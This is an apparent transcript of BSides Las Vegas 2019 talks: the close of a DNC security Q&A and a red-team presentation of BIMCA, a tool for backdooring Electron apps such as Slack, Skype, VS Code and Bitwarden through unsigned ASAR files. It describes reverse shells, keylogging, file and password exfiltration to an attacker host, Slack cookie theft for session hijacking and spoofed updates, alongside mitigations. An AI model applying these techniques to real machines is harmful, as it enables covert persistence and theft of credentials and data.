← All talks

BSides Las Vegas 2019 D1 - Breaking Ground

BSides Las Vegas8:11:50977 viewsPublished 2019-08Watch on YouTube ↗
About this talk
BSides 2019 Las Vegas
Show transcript [en]

Check one, two, two, two. Check one, two, two. Check. All right, is this thing on? Awesome, excellent. Thanks for coming, folks. It's a big room. Bring it on up. Come on. You're all way the hell back there. Oh, well. So you're not here to listen to me, so I'm just going to let him talk. Hello, I'm Bob. Okay, so I think this is the part where you can ask questions, and I will say, oh, my God, you're the smart ones. You tell me. Question. Yeah. Yeah, so hiring is... So we're going to have you repeat that question so everybody can hear. So I looked at democrats.org slash jobs, and I noticed that there were no security postings. What can we do about that, or do I just email you

directly? Yes, you can email me. So we have filled the roles that we have, but obviously... So interesting factoid. The DNC is roughly 200 people. I forget what the... real number is. If you think about the combined organization that I left, which was AOL plus Yahoo, that's almost as big. Those security people, that team is almost the same size as all of the DNC. So I'm never going to get the funding to go hire another 10 people. It's just not going to happen. So what we have to figure out is how to fill this role. So a lot of people have said, I'd like to volunteer. And up till recently, we haven't We haven't had

enough of the right foundation in place with the right permanent people in order to take advantage of people who wanted to volunteer. Now some people may just want to quit their jobs and help and there may be places where I can help you all so tweet at me and I'll send you my email address. But it's an interesting thing where a lot of people said, "Oh, I want to volunteer a few hours here and there and do X, Y, and Z." But if you don't have the foundation, It's really hard. And part of the foundation is, like I said, there's people, process, and technology. So a lot of what we have to do is work

with the various teams, and that means getting to know the teams and what is their history, where is their technical debt, where is their process debt. And all of that just takes a lot of time. So we haven't been in the place where there has been a shepherd who could then say, okay, you're the expert in this thing. Go. So we can't have like 20 people just coming, logging in and just trying to help. That wouldn't actually help. That would slow things down. Sort of like Mythical Man Month, are you familiar with that book? Oh, so it's a good book. Anybody read that book? Mythical Man Month, oh, it's a classic. It's a short read.

The quick summary there is, you know, adding people slows you down, it doesn't speed you up. But it has other benefits, so I feel like we're kind of in that position now. But yeah, I'd love to hear from more people who would like to help and in what way they'd like to help. And as we get further into the election cycle, as we go from two dozen candidates to a smaller number, those opportunities may appear a little bit more clearly than they are today. Two dozen is a little bit rough. But having said that, if there's a candidate that you know, I would never stop you from reaching out to the candidate and to the

campaign and saying like, I can do this. But I also, you know, hopefully that came through in the talk. A lot of the stuff that really needs to get done is some foundational, real basic stuff. And so I just, you know, want people to understand like you may be giving the talk on malware reverse engineering and you've got new techniques and a new code base that you're releasing open source today. and we really need you to help figure out why my password doesn't work for the database. That's just the practical reality of dealing with non-technical organizations that are distributed. That's kind of the challenge that we're up against. It's a good challenge, but it's a

little bit rough. - Alright, so for anybody who wasn't here, I'm gonna set this microphone right here. If you have a question, come on up, ask your question on the mic, then put it down and take your answer, okay?

Good morning. I sent you a note on idler.com about volunteering. You answered some of those questions in your presentation. I mentioned Maciej Siglowski's site, and for anybody who doesn't know, he's got a couple of essays on working on a campaign. That's very good. It's idlewords.com. You mentioned that Digidems, and Mr. Siglowski does as well, you mentioned that they hired 81 people. for 2018. There's 435 house seats, there's 33 or 34 senate seats, there's 50 states. So it seems like there's a disconnect there. I'm a semi-retired IT professional. I've got time, and I can volunteer locally and I will do that. But I've got a lot more cycles than the local campaigns are going to consume. So how do we match up the people

that have the time and this apparent disconnect between the number of people available and the number of needs that are out there. - Yeah, so that's a great observation. So I don't run the Digidem so I can't really speak for them, but obviously finite resources mean finite number of campaigns. And so I think we're really counting on the people who within that community are thinking about which are the battleground states, which are the highest priority ones, that they're gonna be doing a good job of that. Again, I majored in political science, but I'm not gonna be the person to say which states are the most important states for people to place these resources in. I'm

gonna let people who have done that multiple times do that. So I think it's really a matter of resource allocation. And then groups like Ragtag actually do have a process where you can apply to be a Ragtag volunteer and they'll do their best to hook you up with various campaigns. That's a partial solution, but there's no one correct solution. So when I said I really want people to think about, you know, just keep trying, I talked to a few people who applied to the DNC, it's like, ah, we have so few roles, it has to be a really, really strong match, otherwise, I can't bring you on. I don't have 150, 200 people you know

heads so you know we have to we have to hire very carefully but I tell them like I don't want you to be discouraged this is one way that you can contribute there are a thousand others I only know of a few of them so to keep looking and so part of the answer is and I'll reply to your to your mail at some point when I can get caught up but I really want people to make it a project to keep looking it's not like you know you strike out once and you're done like you continue to try. This is messy and it's organic and whatever you come up with will be obvious in

retrospect, but I can't predict what that will be for you and for the organization you end up protecting. So just keep trying, please. We need more people to do that sort of thing. So thank you for the work you've already done. Yeah, jump on in. Hi, good morning. I'm Jack. First of all, I guess thank you for for what you do because I think InfoSec pros leaving Silicon Valley and working for the civil society side of things is really important. The only way this starts to change. I don't know if anyone tells you that, but thank you. What sort of outreach, I was pleasantly surprised by how much outreach occurs to support the campaigns like

DigiDems, but once the blue wave's in office, what's being done at the state and local level or anything in terms of that similar support. Yeah, thanks. - Yeah, so again, so it's very interesting. When I started, it was obvious that I had to work to protect the DNC. And the other interesting thing about working in my role is I don't have to be coy with anybody about the hand I was dealt. It's the subject of books and articles and things like that. We've been working really hard to continue to evolve, modernize a lot of systems, try to cut technical debt, but not long after I started, got my sea legs, then Tom Perez is the chair, made sure I understood that helping the state parties

was going to be a very high leverage thing. And so not just protecting them, but giving them some of the tools to be able to help campaigns as they were starting again. How many campaigns are there in any major year? a bajillion up and down the ballot. So it's not just the presidentials that we're worried about. I mean, all the way down to school board, that kind of thing. So the trick for us is to try to figure out how to be high leverage. And so we did a lot of that work in the midterms. But again, I was just kind of guessing, like maybe people will want a webinar on, you know, doing this.

And like maybe we bring in the social media companies and have them do a webinar. I don't know. We're making this stuff as we go along. And then we took the stuff that we thought resonated with people and then we've really polished that. So we've been really pushing not just the presidential campaigns, but we've gone back and now we're cycling through all of the presentations, making sure the state parties are aware of this. Now I have email blasts that we send out. I didn't have time to talk about this, but we also have this email list that we send out to them to say, if you see anything that's suspicious, please let us know, even

if you've dealt with it, even if you've resolved it, even if it was nothing, send us a note so that we can then think about that in the broader context. Lo and behold, a bunch of people then sent out a thing saying, ah, this is nothing, but we have this thing. Like, oh, well, a bunch of campaigns are having this thing. Yeah, weird call from Russia. That's weird, okay. The second campaign or state with, oh, okay. So now you start to see a pattern that they never would have seen. And so we're trying to build up a federation of people who are involved and know how to start asking some of the right questions. I

try to respond personally to as many of these alerts as I can get. You can probably guess that sometimes they send me their spam. Like, I don't need this, that's okay. It's suspicious, yeah, but they're just trying to sell you whatever. And so I try to teach them what it is that I look for and try to build up that confidence so that when something bad happens, they really do rope us in. So again, is that like an ironclad strategy with clear deliverables and results? No. But we're trying to take take into account that this is a messy, organic system and that we have to start infusing it as best we can. So working with

some of these partners is gonna help, but yeah, so it's messy. And I'll just tell you, it's messy, it's organic. And the things that I will tell you next year that worked or didn't work will probably surprise me. I think I know what's gonna happen and the one thing I've learned in this job is I will be surprised. How do you manage candidates that don't prioritize their own personal security like their own Facebook accounts or whatever they've had up? You've done something in this space. What tell me your background? I like working in a corporate environment and some really awkward executives that Might not want to have their own so your hypothesis is that? Like senior people in a campaign would kind of have some

of the same behaviors as senior people in a organization Interesting interesting theory so Again, I don't have agents on everybody's machines, so I can't tell for sure, but we do try to lean in a little bit. It's like I'm the personal trainer for the campaigns and for the state parties, and your personal trainer is going to tell you to eat right and don't drink too much and stop smoking and all that stuff. And so I have to find a way to explain, sort of like let them understand I'm here for you, I'm gonna give you the same message over and over again because eating right and exercising, it's kind of what you have to do.

I don't know any shortcuts. But I want to build credibility with them so that I can occasionally lean in to figure out what's really going on, to build that trust so they know I'm not gonna narc on them, I'm not gonna share information between parties, between campaigns. We have very strict confidentiality rules. So, So the good news is that we have some good evidence that the senior people are taking it seriously, and I don't know if that's -- I'm not going to take credit for that. It may simply be the climate. It may simply be that there are, you know, Mueller reports that come out that happen to pertain to this space, and you don't

have that in the industry that you work in. So, again, when I said I wanted to tell you the Yahoo story, even though it's all public, most people don't know it and telling these larger stories is actually part of that and so it may be that they're more sensitized, I'm not really sure but yeah, working with very busy people is very hard but we work with a security person, we have a point of contact so we have the Top 10 things you need to do to run a secure organization. Number one is have somebody in charge. And so for each of the campaigns, we have somebody who's in charge that we can work with. And

it doesn't have to be somebody who's a cybersecurity expert. It can simply be a really great project manager who can then go around and make sure that all of this stuff gets done. And so, so far so good, but again, I can't see everything because they're not remote offices and I'm not headquarters. But so far so good. Five minutes? Okay. Next question.

I have a question about data accumulation by campaigns. And it's kind of a big question. Say it again, about what? Data accumulation by campaigns. So it's kind of a big question, and I'll try and keep it as succinct as I can, but it's not my strong point. It seems like there's a lot of election tech springing up, which revolves around political partisan campaigns accumulating as much data as they can on electors so that they can target them as best they can. It seems to happen on all sides of politics. And I just wonder, as a trend, collecting huge amounts of data, cross-referencing it with other data sets, is it something that causes you any concern

in terms of that being a potential-- well, a lot of data that will be obtained by someone who shouldn't get it in the end? Yeah, so thanks for that. So one of the things that I've noticed is that there's-- so yes, obviously, I'm a security guy. I'm concerned about everything. So if you ask me, Bob, are you concerned about something? Of course. So a lot of the data is actually public data. And that's not widely known. And so we sometimes have a mismatch between what is actually private and what is not and what people's expectation is. Not usually, I mean you generally speaking know that when you go in and fill out a form to register to vote that that information is used in a certain way and

it's given to political parties. But sometimes there's a little bit of a disconnect there. But yeah, I think we continue to need to evolve our thinking in terms of what is PII. I mean think about this for, you know, the notion of public has really changed without us having language over the last several, since the advent of the internet, we haven't really kept up with our mental models. So it used to be that if you wanted to know how much I paid for my house, you could fly to San Francisco. You could go to City Hall between 10 a.m. and 4 p.m., you know, modulo holidays or people feeling like they didn't want to work

that day. So you could go figure it out. You could just ask them. But now we have a world in which you can go figure that out before I exit the door. And it's public information, but those seem very different to me. And so I think there's this larger conversation around what is public, what is not, that we have, and we don't have language really to deal with that. But point taken, yeah. Oh, sure. And then I think we have one last question. What I was thinking of is there seems to be kind of an explosion of kind of canvassing recording apps. So, for instance, if I go and knock on your door and I say, are you planning on voting for candidate A, B or C?

Then I will then, after you give me the answer to that question, just one person to another, I'll go and enter that into some of these apps. And so I've got a sort of a situation where there's potentially kind of an arms race, I guess, between Dems and Republicans where we might all agree that... That's information that might not be public, but I've been it to a stranger. But maybe we shouldn't be accumulating it, but then on the other hand, we've got both parties want to accumulate that information, and neither one probably wants to be the one who says, well, we'll accumulate less. Yeah, I mean, it's obviously a far more nuanced conversation that would

have to involve people who actually do the data analytics and the collection and the enrichment of all that stuff. You as a person who's told somebody who knocks on your door or somebody who calls you or texts you, telling them that you don't plan to vote for this candidate or you're not a Democrat is actually valuable information 'cause it means we'll stop bugging you. So I think it's, you know, it kind of works both ways. So the last thing you want is every campaign to constantly call you because there's no predictive analytics around whether or not you're going to be amenable to having the conversation. So again, I'm not the data analyst. I don't even

play one on TV, to be honest with you, but I think it's one of these things where there are some real benefits to collecting and sharing that information. But you're absolutely right. This is a new world of data, and obviously there have been some high profile events around data acquisition and manipulation. So yeah, I think we have to continue to be vigilant. Okay, last question, if any. I think they want you to go to the microphone. It's exciting. So I hear you have like a really awesome vintage crypto collection. This is true. This is true. What do you have in your collection, sir? So I started collecting back at Netscape, which was the company that made a $35 browser. And so I started collecting, my first

item was a, it's called an M209, which is an old Army device, many of which were made by the Smith Corona Corporation, and if you think about it, it kind of makes sense, 'cause you need the kind of skills to build design and roll out something that is a mechanical device. So it has little cipher wheels and you can encrypt and decrypt. And I was just fascinated by this. One of the things I really like about it, now that you ask and none of you care a damn about this, but one of the things I like about it is when you encrypt, the ciphertext is put into blocks of five characters and then a space

and five characters. I thought, well, that's weird. It must be a bug. And then I started researching this and I was like, no, it's not a bug. You need to now give this to the teletype guy who's going to then wire this via Morse code and it's just easier than just a long string of characters. So you break it up. But when you decrypt it, it doesn't do that. It actually now looks like regular English text. They put this into hardware. Like what? That's crazy difficult. And there's all sorts of little flourishes on the thing. So I got the bug and I fell in with a group of misfit crypto collectors and just started buying

a few other things here and there. And to answer the obvious question, yes, I have an enigma. I know you're all wondering, do you have an enigma? Okay, I think that's it. So thank you all. Thank you for coming. I'm so honored. Really, really, thank you. And please, please, please find a way to contribute. Don't let me do this alone. No. No. Good morning. Welcome to B-Sides Las Vegas Breaking Ground. This is Pavel and he'll be giving a talk on BIMCA. Electron post exploitation when the land is dry. But first a few announcements. We'd like to thank our sponsors and volunteers without whom this event couldn't happen. Especially Critical Stack and Valmail and Amazon and Blackberry

and the NSA. These talks are being streamed and recorded so please don't use your cell phones And if you have questions, Pavel, do you want questions during your talk or after? If you have questions, raise your hand and I will bring the microphone over to you. Thank you. Hi, everyone. My name is Pavel Sakhalidis and I'm a senior consultant for Context Information Security, which is based in London. So before I begin, when I was making the presentation, I was given two pieces of advice. One advice was that I should start with a joke. And the second advice was that I should practice, I should record the whole thing, and then I should just do the circle again and again until I'm happy with the result. But by recording

my presentation and listening back to it, what happened was that I heard my own voice, and I heard how I sound to the outside world. So instead of starting with a joke, I'll start with an apology because I have no control over my voice. Having said that, today I'll be talking about electron post exploitation when the land is dry and I will introduce a tool as well that does the whole process a bit easier. So let's assume that you are on a red team job, you have done your phishing campaign and somebody just opens the Word document and you get a beacon back. The next sensible step would be to just try and find a way to persist on the system. But let's assume that the the

endpoint is running some sort of endpoint protection that you've never heard of, never seen before in your life, and just blocking most of the things you try to do to kind of start it on when the machine boots. That is where Electron applications come into play. And I will start straight away with a demo to display how it works in action, and then we're going to discuss how it can be exploited.

So, on the right hand side, we have the victim. On the left hand side, we have the listener that the attacker has set up. At this point, the user will just, let's assume the application is back, or don't pay attention to the command line, and when they log in, we will see that on the left, we get a reverse shell back. This runs Ubuntu, and we can see that Skype runs without any sort of warnings. However, we get a shell back. This works across all operating systems as long as the application is built with Electron. So now we're going to see how actually we can achieve that. These are some popular desktop applications that have been built with Electron. The

ones that stand out are Slack, Signal, Visual Studio Code, and Skype. In this instance, it is worth mentioning that Skype has three versions. One version is Skype for Business. This one is not built with Electron. Second version is the one that's built in the Windows 10 App Store and that as well is not built with Electron. The third one is the one you download on the website and that's the one that's built with Electron. So that's the only one that's vulnerable across the operating systems. what exactly is Electron and why do more and more companies use it? It practically runs Node.js in the back end and Chrome in the front end. And it's effectively Chrome in a box. So any Electron application you have running,

it's practically a Chrome browser running alongside everything else. And it was developed by GitHub about 2013 and I think their first big project was Atom, the Atom browser. The Atom code editor, sorry. So why do more and more companies use it? Well, the answer is quite obvious, is because it's cost effective. You have to just write it once and then cross compile across the operating system you want to offer support. And then you do not need to hire software developers. You can just use the code you use on your website and then you just put it on the electronic application and that's it. So this is an example of how Skype looks like. You can practically open Skype and

press Ctrl+Shift+I and the developer console will open. So you can see there are the inspector, elements, network manager. It's effectively Chrome. That's pretty much what it is. So to understand what makes this attack possible, we'll have to discuss how it actually works, how Electron works. Electron is based on ASAR files, which ASAR files is another format of a compressed archive like ZIP or TAR or anything like that. So when you double click on an app, the first thing it does, it just runs Chromium and Node.js, it kind of spins that up, and then what it does is it loads its bootloader, it's easier to understand it that way, from Electron.asar. Once the environment is ready, because "elector.asr", what it does is

it prepares the whole environment for the application to be loaded. Once that's done, "app.asr" is loaded, which is effectively the source code of the application. If you open "app.asr", it's effectively a web root. There's an index.html file, which you just... That's the file that's loaded, and then everything else is loaded after that. Here are some facts about "asr" files. They're not encrypted, they're not signed, they're not scanned by AV software, although zip archives are scanned in RAR and ACE and TAR and everything else. However, ASR files are not, and they're not even encrypted. And the last and most important one is the reason why this whole presentation came to be, is that there are no

integrity checks in place to make sure that once you install something that it's right there, right in the format that it should be.

So here I made an example file where I took the ACAR test file and just put it in an archive and uploaded the virus total. And from the 50 old engines, only five of them have identified it. And I was quite surprised that Baidu, like China, has that already. They are already scanning those kind of files. And I think three out of those five products are from China. So, might make someone think, like, why do Chinese people just scan that and nothing else does? So, developers are weird creatures. We try and protect the source code and hide the source code, make sure nothing is changed, nothing is edited, modified, or whatever. However, there have been

a lot of developers coming front and saying, "Can we encrypt the source files or protect source files or do something that someone might not be able to change the source files?" And the destiny of all those issues is they end up closed because they say, "Well, no, if you want to do it, you have to do it yourself. This is how Electron works, and this is how it will work." So the tool. I believe pretty much all of us here have at some point written a script or a tool or some sort of application, and then once we have it, we have to find a really cool name about it. I went the other way.

I always had BIMCA because I had a teddy bear called BIMCA when I was young, and I really wanted to use this name. So I have almost managed to make it happen. So at the moment, BIMCA stands for Basic Electronic Exploitation Modular, and then I will need your help on the KA. I'm happy to accept any recommendations afterwards, but I will reward anyone that has some sort of suggestions with a beverage of your own choosing. I'm happy to bribe people to get it working. And out of the box, at the moment, what it does is you can install key loggers, take screenshots of the application or the entire desktop, you can inject operating system commands, access devices, and

you can create targeted modules for applications. I think the most interesting part of that is the targeted modules. And here we're going to see an example where an attacker can egress source code files from Visual Studio Code.

Once again, on the right there's the attacker's endpoint, and on the left is the developer that just runs Visual Studio Code. As you can see, no warnings, nothing came up, everything's fine. And then the developer starts opening files. This module is designed to only exfiltrate open tabs, rather than the whole directory structure. So you can see that on the right, files are beginning to appear, and those are the ones that have been opened by the developer. And by just clicking on a file, we can see its contents. If someone wanted to take this a step further, they could just inject the file in the source code. And because probably Visual Studio Code has everything already unlocked and ready for the developer to use, they could just do

a git commit and just push to master. Well, assuming that that company doesn't have code review process and all that. But if someone is not careful enough, you may end up with code in your production environment that shouldn't be there.

So once I built the tool, I was like, I'm gonna play it safe. I'm just gonna contact the Electron team and tell them, this is what I did, this is the reason how it came to be, do you think it should be fixed or if something should be done? And this is the response I got from them. Yes, the slide is empty because I got no response at all. So at that moment I said, okay fair game, it's not a bug, it's a feature, so I'll just keep going with the whole process. So how does it actually work? I really hope at this point I could say that there's some magic that was done and that I did something cool and I found a really cool trick

or something. No, there's nothing like that. You can just take electron.asr, just unpack it, modify a file, put your payload, and then pack it again, and that's the end of it. So when you unpack electron.asr, there are a lot of files that can be used. I will have one. Thank you. One bowl of no yellow M&Ms. Why not? Oh, did I put that in? Yeah, so apparently I put in as a requirement that I don't want yellow M&Ms. And it actually happened. OK, thank you. And there are a lot of files that someone can edit to inject their payload in. However, I found that the most reliable one is ChromeExtension.js. So, Electron offers a number of

API, a number of event listeners that you can just trigger when the application loads. One of them is application ready or window created. The way it works is you run the Electron app, that's the application, then you open a window and then you have the web contents. That's kind of format of it is. And then you just pack the file and put it in its place and then wait for the user to run the application. This is some basic functionality that BIMCA has. One is to unpack or pack a file in case you want to not unpack Electron, just unpack the application itself and see what it does and maybe find an XSS that wasn't there, that nobody knew was there, just whatever you want to do. And

then there's the injection where you could just take a module and inject it inside Electron. When you run inject, you don't have to run unpack, inject, pack. You just can do inject and it does everything for you. Also at this point, I would like to also say that I hope there would be sufficient documentation on how to write your own module at this point. However, there isn't. So if you want to build a module, just have a look at the existing modules and see how those work and try and figure it out, or just drop me a line and I will help you. So this is what an electron ASR file looks like. A lot of folders, a lot of JavaScript files, and you can do whatever you want

with it. So payloads. Does anyone here hate JavaScript with a passion like I do? Yeah. If someone has never used JavaScript, imagine Java and PHP getting together, having a stroke, then having another stroke. Okay, I'm going to leave it at two strokes. That's what JavaScript is. So all payloads are written in JavaScript, all of them. And there are two ways you can execute something from Electron. One of them is from within the context of the application. So you just inject JavaScript inside the application. And the other one is within the context of Electron. So that's kind of one step behind on the Node.js level. So here's how the application's context injection works. It's been on JavaScript. Whatever works in Chrome will work in

Electron. You can just, instead of trying to find an XSS endpoint, an XSS vulnerability and exploit that, you can just inject it straight away inside the application. And long story short, if you just want to load the whole jQuery and update the whole interface of the application, you can do that. And then there are extra bits that you can call from within the application's context that will give you more functionality like read files or access devices. The Visual Studio Code egress that we saw is from the application's context. So you would just code inside that was just running on intervals, checking when a file is open, and then reading the file system, getting the file, and exfiltrating it back. There are some restrictions though. So if the application is

using CSP headers, you will not be able to do any post request, any AJAX requests back to your endpoint. Those obviously can be bypassed by updating host file, but then the game is in a whole different level, and it's not just in that application. And so Skype, for example, is using CSP headers, but it's not using it in the HTTP headers, it's using it within a meta tag, which I couldn't find a way to bypass. So Electron offers you some sort of API manipulation techniques that you can just remove HTTP headers, but it doesn't allow you to update the file that's coming, updating half the file, half the response. And then we have web views that cannot be accessed. Web views is like a sandbox that runs on a

different process ID within Electron. Slack, in this case, is using web views, so you cannot install something within the application's context. You can't install the keylogger, because the keylogger is effectively JavaScript that just does on key up and just grabs all the keystrokes. But that does not mean that you cannot execute anything within the electrons context, like a reverse shell, like Skype, for example, because the Skype backdoor was not in the application's context, it was in the electrons context.

So here's how the electron contexts payload work. It's still JavaScript, Node.js this time, and there's more functionality of the perspective of the server. So you can intercept or block HTTP requests. This means that when the application runs and it checks if there are new updates, what you can do is you can either block that request and then the application will think that, okay, I'm on the latest and greatest version, no need to update. Or you can spoof that whole request and then redirect the user to an update that's yours. In this case, that would be, I think, more dangerous because that way someone might just install with administrative privileges a new backdoor. And then, another interesting bit is that you can, because it's still a browser that's running,

if it tries to communicate with an endpoint that has self-signed certificates, it will just stop you. It will just say, "Sorry, it just doesn't work." There are event handlers that are triggered every time something doesn't work. like for example the certificates and you can just instruct it to bypass that. So if you have an endpoint that is just an IP address and you can't install a valid SSL certificate, you can just install this event handler and your request will go through. Now what do you need to make this work? Well obviously you need local access like we discussed in the scenario with the red team before and you need bright access to the installation folder.

On Windows it's easier because if an electronic installer detects that you are a low privilege user, you will just install the application data and therefore you have access to write in that directory. But most installers also offer you the capability to install across the whole system. In that case, you will go to program files, which makes life a little bit more difficult. On Linux and Macs, because you need elevated privileges, to install something, it will be a little bit more complicated. Now, ways to exploit, and this is where it gets interesting. So, you can run operating system commands and you can do anything you want, however, the executable is not modified. So, the hash of the file of the slack.exe or skype.exe or vs code.exe

remains exactly the same. So, what it does is you just instruct a totally legit application to run something that you want it to run and it's just gonna do it. Therefore, we have gone to great lengths to create AppLocker and white listing and black listing and all that kind of thing and memory in memory patch protection and reverse engineering protection and encrypting the exe files and everything and then you have something like this where you just leave the application as is but then you can just run whatever you want on the side. Another valid attack would be to redistribute a malicious application. That way someone will just download the installer, the installer will obviously not be signed, however how many times did we

actually check if something is signed? Just click the yes button and it just installs. And then, but the end, but the installed application, like slack.exe will still be signed, therefore it will bypass any white listing restrictions you have, or anything you have on that box. Another interesting way to attack something is you gain access to data that you previously did not have access to. For example, passwords within a password manager or messages within Slack. And last but not least, you can spy on the user using a web camera, screenshots, or microphone, or whatever you want. Someone might argue here that this is called gathering intel on the target. Society calls this stalking, and it's not cool and should be avoided at all

costs. So here's an example of how we can egress stored passwords within Bitwarden. Does anybody use Bitwarden? Nice. Don't use the desktop app. So here again, on one side we have the user, and on the other side we have the attacker's endpoint. As we can see, the user will just unlock their vault, which we don't care about this password because it's what's inside that counts, and just once unlocked, everything will be egressed back to the attacker. And as simple as that, you have just lost all your passwords because you installed a desktop app that has been somehow bugged out. Obviously, this doesn't work on the web versions of those apps. So what do these next generation applications try

to achieve? The first thing is bring the web to the desktop. I say leave the web in the web, but okay, fine. If companies want to save money just building everything with JavaScript, that's fine with me. The source code is stored locally, again, that's fine with me, but it shouldn't be fine to not perform integrity checks on your files, because you expect you're running something and then you have no control over what format it is now, if it has been backtored. Another important thing is that you introduce a whole range of web vulnerabilities to the desktop. If you have an XSS attack, XSS vulnerability on a website, it's highly unlikely that you'll be affected on some

other website. Most of the time, it's just affected on that specific website, unless someone drops a zero day, which if someone drops a zero day to get you, you probably have bigger problems than just using Electron. And then you can also use devices, which if you do on the web version of the application, Chrome will just pop up a box saying, "Do you want me to use the camera or microphone?" In Electron it doesn't. It just says, "Can I use the camera?" "Yes, here you go." The light of the camera will turn on, so you're not bypassing that. It's just that you have no idea when that's enabled. Here's an example of how a web vulnerability, which we take on lightly, which

is when logged-in sessions are transferable, which is literally like a low issue, we don't really care about it. But here's how it could work. a user that's running a backdoored version of Slack, and they try to log in. However, this user is quite security aware, and they have two-factor authentication as well. So they feel pretty good about themselves. So once putting the 2FA in, the user will be logged in back into Slack. At this point, what Slack does, what the backdoor does, it sends all HTTP cookies and URLs back to the attacker's endpoint. So once someone's logged in, By this point, everything has already been sent out to the attacker, and it keeps sending it to the attacker, so nothing stops. And

here are all the cookies that have been sent, grouped by time. So we pick any of those, and we take the whole cookie. From this cookie, I realize I say cookie quite a lot, from this cookie, we just need B, D, and X. Next step, so this video was done on the same machine, but it works across IP addresses, it's just easier to do a video on the same box. So what we do is we just recreate all those three cookies and we give it access to slack.com and all subdomains. If you don't include all subdomains, you'll just end up in an infinite loop. So once you move all the cookies, yes, I could have

written a script to do this quicker, but I'm really good at copy-pasting and I wanted the whole world to see. So if you look on the top right, it says sign in and get started. Once all three cookies are in place, do you feel the suspense? So once it's refreshed, the top right becomes your workspaces and by clicking it, you have just gained access to Slack. And because if someone's running a local version of Slack, where they just shut down their machine, they will not be logged out, it means that you will have access here until the session expires. And if you keep using it, the session will probably not expire. Also, this is a good way to check if developers have shared passwords, API keys, if someone uploaded

a legal document or a contract or something, you can just access the whole history and just do whatever you want. So how does this, the previous attack actually work? So one of the API event handlers that Electron offers is the on before send headers, which means that before any HTTP request is done, it goes through here. So what we do here is I take the URL and the cookie and send it back to the attacker. This way you can just, yes it does duplicate all HTTP requests, but if we add some logic to it, we can just stop the moment we have everything under control. Also, it's worth mentioning that this happens on the application level, so there's no need to install

a system-wide proxy or something that the user will notice. Because if an attacker does that, it's very transparent. They will never know what's happening. And if my endpoint, instead of example.com, is slackupdates.com, JP or something strange, it will not be noticed because they will think that, okay, this is a legit slack endpoint. So what are some ways to protect ourselves? At the moment, there isn't an official fix. However, Electron 6 was released last week but didn't have time to check if integrity checks have been implemented. Hopefully this will change. Another step is to install applications of the high-privileged user. This mostly applies on Windows. However, even by doing that, we can just hope that the attacker does not elevate their privileges, because once they

do, once they have right access to the folder, it's game over. Then we can monitor the process tree. This could work, I think. So if you see slack.exe's or running PowerShell, you can be, okay, this shouldn't happen, we should investigate. But if you look at the right, that's a legit Visual Studio Code process tree. So it runs Git, it runs CMD, XE, it runs PowerShell, it runs everything. So it might be quite difficult to identify what happens here. And this will only protect against command injection. If an attacker wants to make a CNC server and just use HTTP requests from within the app, you will never know, because that It's Chrome itself that does all

the requests. And overall, if you can avoid it, don't install the desktop app. And yes, I am talking about Slack. Because if you have the web version of something that does exactly the same as the desktop version, at this point, there is no reason to install a desktop version. Just use the web because the browser will protect you, will sandbox everything, and will let you know if someone tries to access something that they shouldn't. Now, is it just Electron apps that are vulnerable to this, or similar attacks? No, because Spotify is not using Electron, but Spotify is using the Chrome embedded framework, which is bare metal Electron. And instead of using ESR files, they use the

so-called SPA files, which stands for Spotify app. However, renaming an SPA file to .zip You can just extract the file, update index.html, put your hello world in, and that's it. I assume there could be some interesting attack vectors to be tested with Spotify. I haven't done any of that. I just realized that it's vulnerable as well and thought to mention it in case someone wanted to use it as homework. So the summary would be, Electron apps, if you are on the red team or if you have compromised the host or for whatever reason and you want to either maintain persistence or if you just want to gain access to applications or data within the applications, you can just use an

electron app that's installed. Most probably you will have some sort of Visual Studio Code or Slack or Signal or something like that installed on a corporate machine. Well, I don't think Signal would be on a corporate machine. But yeah, you get the point. Fortunately and unfortunately is that this whole thing will stop existing the moment Electron adds an integrity check on those two files. Because the moment they do that, you won't be able to change anything without actually changing the exe signature, which I think this is the most important part of the whole attack. That yes, if you have pseudo access or admin access on a host, Yes, you can do whatever you want, but

if you try to change an exe file, you will change it hash. So by changing the hash, you will trigger some sort of alarms and alerts. In this case, nothing like that happens. The exe will always stay the same, nothing will change, and you might have already have some sort of backdoor application that you have no idea that's there. And because antiviruses do not check ASAR files, That means that you might have something in those files that will never see the light of day. I was once on an engagement and once I got the beacon back, I was already running a system. No matter what I did, they were running some sort of weird, well

weird, unknown endpoint protection. No matter what I did, it would just block everything. So that moment, I realized they had Slack installed and I just put the PowerShell payload in Slack, and when the user logged in, it would just spawn the shell back. So if you want the source code, it's on GitHub, and I will also be on Defcon Demo Labs on Friday if you want to come and see it in action, or play around with it, or ask any questions, or make a module, I don't know. You can come and have a look. And yeah, that's pretty much it. Any questions or anything you would like me to clarify? I realize this was quite quicker than expected. - Hello. Hi. Thanks for

the presentation. I have a couple questions because you mentioned that CSP headers are honored. Yes. From a developer's perspective, from an app developer's perspective, is it possible to use something like SRI, sub-resource integrity, in order to verify your JavaScript files inside the application? Would that stop an attacker? Because integrity checks on the whole archives. That's something that Electron has to do, right? You can't do it as an application developer, but you could use SRI, I'm thinking, to check the JavaScript files within your app. Yes, but that will only protect you against a specific specific file that you as a developer have inserted in the application. But the attacker can insert their own. So it can load something from

example.com or attacker.com which since they inject the JavaScript they will just not put the SRI in and they will just load the file as normal. Thank you for the presentation. It was really nice. I was wondering at some point you mentioned that this electron is on Node.js, right? Yes. So have you checked, was it able to access any resources that Node.js has access to? For example, I believe it also has an access to file system? Yes, yeah. So the Visual Studio Code example, that was, so the application was calling the Node.js file system, and that's how it's reading the file, and that's how it's sending it back. So anything that Node.js does, it can be accessible. - So that means we can

actually, like this could be used to exfiltrate any files hosted on that workstation. - Yes, you can create your own browser, like CNC server, and just double click on folders and do whatever you want, yeah. - Great talk, thanks so much. So I was just curious, maybe I missed this, for getting a reverse shell, like from the Electron context, how does that exactly work? - So you can call, Actually, I can show you. I think it'd be easier. So if you do Linux, for instance. How do I? Does anyone know the shortcut? Oh, there it is. Magic happens. Yeah, so you just use the Node.js net and child process. You can just run whatever command you

want, whichever host. And you can just, as long as you have, if you have a one-liner to do it, you can just use here and it just will work fine. And then you mentioned the privilege thing. difference for the install application? - Yes. - So how does that protect the process? - So if let's say you have a user just double clicks on the phishing email and the attacker gets the version but they're still running on the same privileges as that user. If Slack was installed in program files, you would not be able to change that file. So in that essence, it will not, it's more secure, but the moment the attacker gets admin or

